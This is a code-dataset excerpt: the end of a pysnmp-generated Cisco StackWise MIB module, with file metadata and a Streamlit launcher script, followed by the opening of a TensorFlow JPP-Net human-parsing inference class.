cswSwitchNumCurrent indicates the switch number of the system that is running with the power budget less than the power consumption.") cswStackPowerUnbalancedPowerSupplies = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 15)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerUnbalancedPowerSupplies.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnbalancedPowerSupplies.setDescription('This notification is generated when the switch has no power supply but another switch in the same stack has more than one power supplies. cswStackPowerName specifies a unique name of the power stack where the unbalanced power supplies are detected.') cswStackPowerInsufficientPower = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 16)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerInsufficientPower.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInsufficientPower.setDescription("This notification is generated when the switch's power stack does not have enough power to bring up all the switches in the power stack. cswStackPowerName specifies a unique name of the power stack where insufficient power condition is detected.") cswStackPowerPriorityConflict = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 17)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerName")) if mibBuilder.loadTexts: cswStackPowerPriorityConflict.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPriorityConflict.setDescription("This notification is generated when the switch's power priorities are conflicting with power priorities of another switch in the same power stack. 
cswStackPowerPortName specifies the unique name of the power stack where the conflicting power priorities are detected.") cswStackPowerUnderVoltage = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 18)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerUnderVoltage.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnderVoltage.setDescription('This notification is generated when the switch had an under voltage condition on last boot up. cswSwitchNumCurrent indicates the switch number of the system that was forced down with the under voltage condition.') cswStackPowerGLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 19)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerGLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerGLS.setDescription('This notification is generated when the switch had to shed loads based on a sustained over load (SOC) condition. cswSwitchNumCurrent indicates the switch number of the system that goes through graceful load shedding.') cswStackPowerILS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 20)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerILS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerILS.setDescription('This notification is generated when the switch had to shed loads based on power supply fail condition. cswSwitchNumCurrent indicates the switch number of the system that goes through immediate load shedding.') cswStackPowerSRLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 21)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerSRLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSRLS.setDescription('This notification is generated when the switch had to shed loads based on loss of a system in ring topology. 
cswSwitchNumCurrent indicates the switch number of the system that detects the loss of system in ring topology.') cswStackPowerSSLS = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 22)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerSSLS.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSSLS.setDescription('This notification is generated when the switch had to shed loads based on loss of a system in star topology. cswSwitchNumCurrent indicates the switch number of the system that detects the loss of system in star topology.') cswStackMemberToBeReloadedForUpgrade = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 23)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMemberToBeReloadedForUpgrade.setStatus('current') if mibBuilder.loadTexts: cswStackMemberToBeReloadedForUpgrade.setDescription('This notification is generated when a member is to be reloaded for upgrade.') cswStackWiseMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1)) cswStackWiseMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2)) cswStackWiseMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 1)).setObjects(("CISCO-STACKWISE-MIB", "cswStatusGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBCompliance = cswStackWiseMIBCompliance.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBCompliance.setDescription('The compliance statement for entities that implement the CISCO-STACKWISE-MIB.') cswStackWiseMIBComplianceRev1 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), 
("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev1 = cswStackWiseMIBComplianceRev1.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev1.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev2 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev2 = cswStackWiseMIBComplianceRev2.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev2.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. 
Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev3 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev1"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerAllocatedGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev3 = cswStackWiseMIBComplianceRev3.setStatus('deprecated') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev3.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. Stack Power entities are added in this revision.') cswStackWiseMIBComplianceRev4 = ModuleCompliance((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 1, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswNotificationGroupSup1"), ("CISCO-STACKWISE-MIB", "cswStatusGroupRev2"), ("CISCO-STACKWISE-MIB", "cswStackPowerEnableNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswDistrStackLinkStatusGroup"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerSwitchStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortStatusGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerNotificationGroup"), ("CISCO-STACKWISE-MIB", "cswStackPowerAllocatedGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackWiseMIBComplianceRev4 = cswStackWiseMIBComplianceRev4.setStatus('current') if mibBuilder.loadTexts: cswStackWiseMIBComplianceRev4.setDescription('The compliance statements for entities described in CISCO-STACKWISE-MIB. 
Stack Global entities are added in this revision.') cswStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 1)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswEnableStackNotifications"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswSwitchSoftwareImage"), ("CISCO-STACKWISE-MIB", "cswStackPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPortNeighbor"), ("CISCO-STACKWISE-MIB", "cswStackPowerType")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroup = cswStatusGroup.setStatus('deprecated') if mibBuilder.loadTexts: cswStatusGroup.setDescription('A collection of objects that are used for control and status.') cswNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPortChange"), ("CISCO-STACKWISE-MIB", "cswStackNewMaster"), ("CISCO-STACKWISE-MIB", "cswStackMismatch"), ("CISCO-STACKWISE-MIB", "cswStackRingRedundant"), ("CISCO-STACKWISE-MIB", "cswStackNewMember"), ("CISCO-STACKWISE-MIB", "cswStackMemberRemoved")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswNotificationGroup = cswNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswNotificationGroup.setDescription('A collection of notifications that are required.') cswStatusGroupRev1 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), 
("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswSwitchSoftwareImage")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroupRev1 = cswStatusGroupRev1.setStatus('current') if mibBuilder.loadTexts: cswStatusGroupRev1.setDescription('A collection of objects that are used for control and status.') cswStackPowerStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerMode"), ("CISCO-STACKWISE-MIB", "cswStackPowerMasterMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackPowerMasterSwitchNum"), ("CISCO-STACKWISE-MIB", "cswStackPowerNumMembers"), ("CISCO-STACKWISE-MIB", "cswStackPowerType"), ("CISCO-STACKWISE-MIB", "cswStackPowerName")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerStatusGroup = cswStackPowerStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerStatusGroup.setDescription('A collection of stack power objects that are used for control and status of power stack.') cswStackPowerSwitchStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchPowerBudget"), ("CISCO-STACKWISE-MIB", "cswSwitchPowerCommited"), ("CISCO-STACKWISE-MIB", "cswSwitchSystemPowerPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchPoeDevicesLowPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchPoeDevicesHighPriority")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerSwitchStatusGroup = cswStackPowerSwitchStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerSwitchStatusGroup.setDescription('A collection of stack power objects that are used to track the stack power parameters of a switch.') cswStackPowerPortStatusGroup = ObjectGroup((1, 3, 6, 
1, 4, 1, 9, 9, 500, 2, 2, 6)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortNeighborMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortNeighborSwitchNum"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerPortStatusGroup = cswStackPowerPortStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortStatusGroup.setDescription('A collection of objects that are used for control and status of stack power ports.') cswStackPowerNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 7)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatusChanged"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatusChanged"), ("CISCO-STACKWISE-MIB", "cswStackPowerVersionMismatch"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidTopology"), ("CISCO-STACKWISE-MIB", "cscwStackPowerBudgetWarrning"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidInputCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerInvalidOutputCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnderBudget"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnbalancedPowerSupplies"), ("CISCO-STACKWISE-MIB", "cswStackPowerInsufficientPower"), ("CISCO-STACKWISE-MIB", "cswStackPowerPriorityConflict"), ("CISCO-STACKWISE-MIB", "cswStackPowerUnderVoltage"), ("CISCO-STACKWISE-MIB", "cswStackPowerGLS"), ("CISCO-STACKWISE-MIB", "cswStackPowerILS"), ("CISCO-STACKWISE-MIB", "cswStackPowerSRLS"), ("CISCO-STACKWISE-MIB", "cswStackPowerSSLS")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerNotificationGroup = cswStackPowerNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerNotificationGroup.setDescription('A collection of notifications that are triggered whenever there is either a change in stack power 
object or an error is encountered.') cswStackPowerEnableNotificationGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 8)).setObjects(("CISCO-STACKWISE-MIB", "cswEnableIndividualStackNotifications")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerEnableNotificationGroup = cswStackPowerEnableNotificationGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerEnableNotificationGroup.setDescription('This group contains the notification enable objects for this MIB.') cswNotificationGroupSup1 = NotificationGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 9)).setObjects(("CISCO-STACKWISE-MIB", "cswStackMemberToBeReloadedForUpgrade")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswNotificationGroupSup1 = cswNotificationGroupSup1.setStatus('current') if mibBuilder.loadTexts: cswNotificationGroupSup1.setDescription('Additional notification required for data stack.') cswStackPowerAllocatedGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 10)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchPowerAllocated")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStackPowerAllocatedGroup = cswStackPowerAllocatedGroup.setStatus('current') if mibBuilder.loadTexts: cswStackPowerAllocatedGroup.setDescription('A collection of objects providing the stack power allocation information of a switch.') cswStatusGroupRev2 = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 11)).setObjects(("CISCO-STACKWISE-MIB", "cswMaxSwitchNum"), ("CISCO-STACKWISE-MIB", "cswMaxSwitchConfigPriority"), ("CISCO-STACKWISE-MIB", "cswRingRedundant"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswSwitchNumNextReload"), ("CISCO-STACKWISE-MIB", "cswSwitchRole"), ("CISCO-STACKWISE-MIB", "cswSwitchSwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchHwPriority"), ("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchMacAddress"), ("CISCO-STACKWISE-MIB", "cswStackDomainNum"), ("CISCO-STACKWISE-MIB", "cswStackType"), 
("CISCO-STACKWISE-MIB", "cswStackBandWidth")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswStatusGroupRev2 = cswStatusGroupRev2.setStatus('current') if mibBuilder.loadTexts: cswStatusGroupRev2.setDescription('A collection of objects that are used for control and status.') cswDistrStackLinkStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 12)).setObjects(("CISCO-STACKWISE-MIB", "cswDistrStackLinkBundleOperStatus")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswDistrStackLinkStatusGroup = cswDistrStackLinkStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkStatusGroup.setDescription('A collection object(s) for control and status of the distributed Stack Link.') cswDistrStackPhyPortStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 9, 9, 500, 2, 2, 13)).setObjects(("CISCO-STACKWISE-MIB", "cswDistrStackPhyPort"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortNbr"), ("CISCO-STACKWISE-MIB", "cswDistrStackPhyPortNbrsw")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): cswDistrStackPhyPortStatusGroup = cswDistrStackPhyPortStatusGroup.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortStatusGroup.setDescription('A collection of objects for control and status of the distributed stack port') mibBuilder.exportSymbols("CISCO-STACKWISE-MIB", cswDistrStackPhyPort=cswDistrStackPhyPort, cswDistrStackLinkInfoTable=cswDistrStackLinkInfoTable, cswStackPowerPortInfoTable=cswStackPowerPortInfoTable, cswStackInfo=cswStackInfo, cswStatusGroupRev1=cswStatusGroupRev1, cswSwitchMacAddress=cswSwitchMacAddress, cswStackPowerSwitchStatusGroup=cswStackPowerSwitchStatusGroup, cscwStackPowerBudgetWarrning=cscwStackPowerBudgetWarrning, cswStackPowerPortOverCurrentThreshold=cswStackPowerPortOverCurrentThreshold, cswSwitchPoeDevicesHighPriority=cswSwitchPoeDevicesHighPriority, cswDSLindex=cswDSLindex, cswStackPowerStackNumber=cswStackPowerStackNumber, 
cswStackPowerInfo=cswStackPowerInfo, cswStackNewMember=cswStackNewMember, cswStackPowerInvalidInputCurrent=cswStackPowerInvalidInputCurrent, cswStackPowerEnableNotificationGroup=cswStackPowerEnableNotificationGroup, cswStackPowerInfoTable=cswStackPowerInfoTable, cswStackPowerInfoEntry=cswStackPowerInfoEntry, cswRingRedundant=cswRingRedundant, cswStackPowerPortLinkStatus=cswStackPowerPortLinkStatus, cswStackDomainNum=cswStackDomainNum, cswStackPowerPortNeighborMacAddress=cswStackPowerPortNeighborMacAddress, cswStackWiseMIBComplianceRev1=cswStackWiseMIBComplianceRev1, cswMaxSwitchConfigPriority=cswMaxSwitchConfigPriority, CswSwitchPriority=CswSwitchPriority, cswStackWiseMIBComplianceRev2=cswStackWiseMIBComplianceRev2, cswStackNewMaster=cswStackNewMaster, cswStackPortChange=cswStackPortChange, cswSwitchState=cswSwitchState, cswStackPowerPriorityConflict=cswStackPowerPriorityConflict, cswStackPowerName=cswStackPowerName, cswDistrStackPhyPortStatusGroup=cswDistrStackPhyPortStatusGroup, cswStackPowerUnderVoltage=cswStackPowerUnderVoltage, cswStackPowerPortInfoEntry=cswStackPowerPortInfoEntry, cswStackMemberToBeReloadedForUpgrade=cswStackMemberToBeReloadedForUpgrade, CswPowerStackType=CswPowerStackType, cswStackPortInfoTable=cswStackPortInfoTable, cswStackPowerInvalidTopology=cswStackPowerInvalidTopology, cswStackPowerPortStatusGroup=cswStackPowerPortStatusGroup, cswSwitchPowerCommited=cswSwitchPowerCommited, cswStackBandWidth=cswStackBandWidth, cswStackPowerStatusGroup=cswStackPowerStatusGroup, cswStackPowerMasterMacAddress=cswStackPowerMasterMacAddress, ciscoStackWiseMIB=ciscoStackWiseMIB, cswDistrStackPhyPortOperStatus=cswDistrStackPhyPortOperStatus, cswEnableStackNotifications=cswEnableStackNotifications, ciscoStackWiseMIBConform=ciscoStackWiseMIBConform, cswSwitchPowerAllocated=cswSwitchPowerAllocated, cswStackPowerInsufficientPower=cswStackPowerInsufficientPower, cswStackPowerPortNeighborSwitchNum=cswStackPowerPortNeighborSwitchNum, 
cswStackPowerPortName=cswStackPowerPortName, cswSwitchInfoTable=cswSwitchInfoTable, cswSwitchPoeDevicesLowPriority=cswSwitchPoeDevicesLowPriority, cswStackWiseMIBCompliances=cswStackWiseMIBCompliances, cswStackPowerPortIndex=cswStackPowerPortIndex, cswSwitchSwPriority=cswSwitchSwPriority, cswSwitchSoftwareImage=cswSwitchSoftwareImage, cswStackWiseMIBComplianceRev3=cswStackWiseMIBComplianceRev3, cswStackMismatch=cswStackMismatch, cswStackPowerType=cswStackPowerType, cswSwitchPowerBudget=cswSwitchPowerBudget, cswDistrStackLinkStatusGroup=cswDistrStackLinkStatusGroup, cswStackPowerVersionMismatch=cswStackPowerVersionMismatch, cswStackPowerSRLS=cswStackPowerSRLS, PYSNMP_MODULE_ID=ciscoStackWiseMIB, cswStackPowerNotificationGroup=cswStackPowerNotificationGroup, cswStatusGroup=cswStatusGroup, cswDistrStackPhyPortNbrsw=cswDistrStackPhyPortNbrsw, cswNotificationGroup=cswNotificationGroup, cswStackPowerGLS=cswStackPowerGLS, cswStackMemberRemoved=cswStackMemberRemoved, cswDistrStackLinkInfoEntry=cswDistrStackLinkInfoEntry, cswSwitchHwPriority=cswSwitchHwPriority, cswStackWiseMIBComplianceRev4=cswStackWiseMIBComplianceRev4, cswStackPowerInvalidOutputCurrent=cswStackPowerInvalidOutputCurrent, cswStackPowerPortLinkStatusChanged=cswStackPowerPortLinkStatusChanged, cswStackPowerPortOperStatus=cswStackPowerPortOperStatus, cswStackPowerUnderBudget=cswStackPowerUnderBudget, cswStackWiseMIBGroups=cswStackWiseMIBGroups, cswStackRingRedundant=cswStackRingRedundant, cswStackType=cswStackType, cswStackPortInfoEntry=cswStackPortInfoEntry, cswStackPortOperStatus=cswStackPortOperStatus, cswStackPowerPortOperStatusChanged=cswStackPowerPortOperStatusChanged, cswStackPowerILS=cswStackPowerILS, cswStackPowerAllocatedGroup=cswStackPowerAllocatedGroup, cswEnableIndividualStackNotifications=cswEnableIndividualStackNotifications, cswDistrStackPhyPortNbr=cswDistrStackPhyPortNbr, cswStatusGroupRev2=cswStatusGroupRev2, CswSwitchNumber=CswSwitchNumber, cswNotificationGroupSup1=cswNotificationGroupSup1, 
cswMIBNotifications=cswMIBNotifications, cswStackPowerMasterSwitchNum=cswStackPowerMasterSwitchNum, cswGlobals=cswGlobals, cswMaxSwitchNum=cswMaxSwitchNum, CswSwitchNumberOrZero=CswSwitchNumberOrZero, cswStackPowerMode=cswStackPowerMode, ciscoStackWiseMIBNotifs=ciscoStackWiseMIBNotifs, cswStackPortNeighbor=cswStackPortNeighbor, cswDistrStackPhyPortInfoEntry=cswDistrStackPhyPortInfoEntry, cswStackWiseMIBCompliance=cswStackWiseMIBCompliance, cswDistrStackPhyPortInfoTable=cswDistrStackPhyPortInfoTable, CswPowerStackMode=CswPowerStackMode, cswStackPowerSSLS=cswStackPowerSSLS, cswSwitchSystemPowerPriority=cswSwitchSystemPowerPriority, cswSwitchNumCurrent=cswSwitchNumCurrent, ciscoStackWiseMIBObjects=ciscoStackWiseMIBObjects, cswStackPowerNumMembers=cswStackPowerNumMembers, cswSwitchRole=cswSwitchRole, cswDistrStackLinkBundleOperStatus=cswDistrStackLinkBundleOperStatus, cswSwitchNumNextReload=cswSwitchNumNextReload, cswStackPowerUnbalancedPowerSupplies=cswStackPowerUnbalancedPowerSupplies, cswSwitchInfoEntry=cswSwitchInfoEntry)
182.735602
5,651
0.798195
8,007
69,805
6.958411
0.099663
0.038983
0.068221
0.007682
0.453568
0.343151
0.312657
0.286255
0.237041
0.216509
0
0.035015
0.097472
69,805
381
5,652
183.215223
0.849352
0.004756
0
0.07989
0
0.179063
0.480983
0.066639
0
0
0
0
0
1
0
false
0
0.030303
0
0.099174
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00a9b7b80e70b2ade8a74bf8036397114cf2dc47
217
py
Python
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
1
2022-01-06T02:21:31.000Z
2022-01-06T02:21:31.000Z
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
null
null
null
app/launcher.py
bcheng004/reddit-recommender
3446ca25b9320a2ca94e4ab1a08056e81edd6d45
[ "MIT" ]
null
null
null
"""Launch the Streamlit recommender app on the port configured in config-st.yaml."""
import subprocess

import confuse

config = confuse.Configuration('RecLauncher')
config.set_file('config-st.yaml')
server_port = config['streamlit']['server_port'].get()

# Fix: the original used os.system(f"streamlit run app.py --server.port {port}").
# Building a shell string from a config value lets an unexpected value be
# interpreted by the shell (command injection) and silently drops the exit
# status.  An argument list with shell=False (the default) avoids both, and
# check=True raises if streamlit fails to start.
subprocess.run(
    ["streamlit", "run", "app.py", "--server.port", str(server_port)],
    check=True,
)
36.166667
62
0.760369
31
217
5.193548
0.612903
0.248447
0
0
0
0
0
0
0
0
0
0
0.069124
217
6
62
36.166667
0.79703
0
0
0
0
0
0.426606
0
0
0
0
0
0
1
0
false
0
0.2
0
0.2
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
00b06443ce4f30563dab2c820a73ba95e0735e30
1,494
py
Python
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
null
null
null
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
null
null
null
src/model/JPPNet.py
quangostudio/fastapi
62eec06a2dd7a5a137373fc0d08017cf240f51a7
[ "MIT" ]
1
2021-12-09T11:15:41.000Z
2021-12-09T11:15:41.000Z
'''
This file implements JPP-Net for human parsing and pose detection.
'''
import tensorflow as tf
import os
from tensorflow.python.framework import graph_util
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
from tensorflow.python.platform import gfile
import time


class JPP(object):
    """TF1 inference wrapper around a frozen JPP-Net graph (.pb file).

    Loads the frozen graph once in __init__ and exposes predict() for
    per-image pose + parsing inference.
    """

    # Magic numbers are for normalization. You can get details from original JPP-Net repo.
    IMG_MEAN = np.array((104.00698793, 116.66876762, 122.67891434), dtype=np.float32)

    def __init__(self, pb_path):
        # Bug fix: the original created TWO sessions -- one configured with
        # allow_growth that was immediately discarded (leaked), and a plain
        # tf.Session() kept as self.sess, which grabs all GPU memory by
        # default.  Create a single, properly configured session instead.
        options = tf.GPUOptions(allow_growth=True)
        self.sess = tf.Session(config=tf.ConfigProto(gpu_options=options))
        with gfile.FastGFile(pb_path, 'rb') as f:
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(f.read())
            self.sess.graph.as_default()
            tf.import_graph_def(graph_def, name='')  # import compute graph
        self.sess.run(tf.global_variables_initializer())
        # Look the I/O tensors up on this session's own graph (the original
        # fetched them from the discarded session's graph).
        self.img_tensor = self.sess.graph.get_tensor_by_name('img_1:0')
        self.pose_tensor = self.sess.graph.get_tensor_by_name('pose:0')
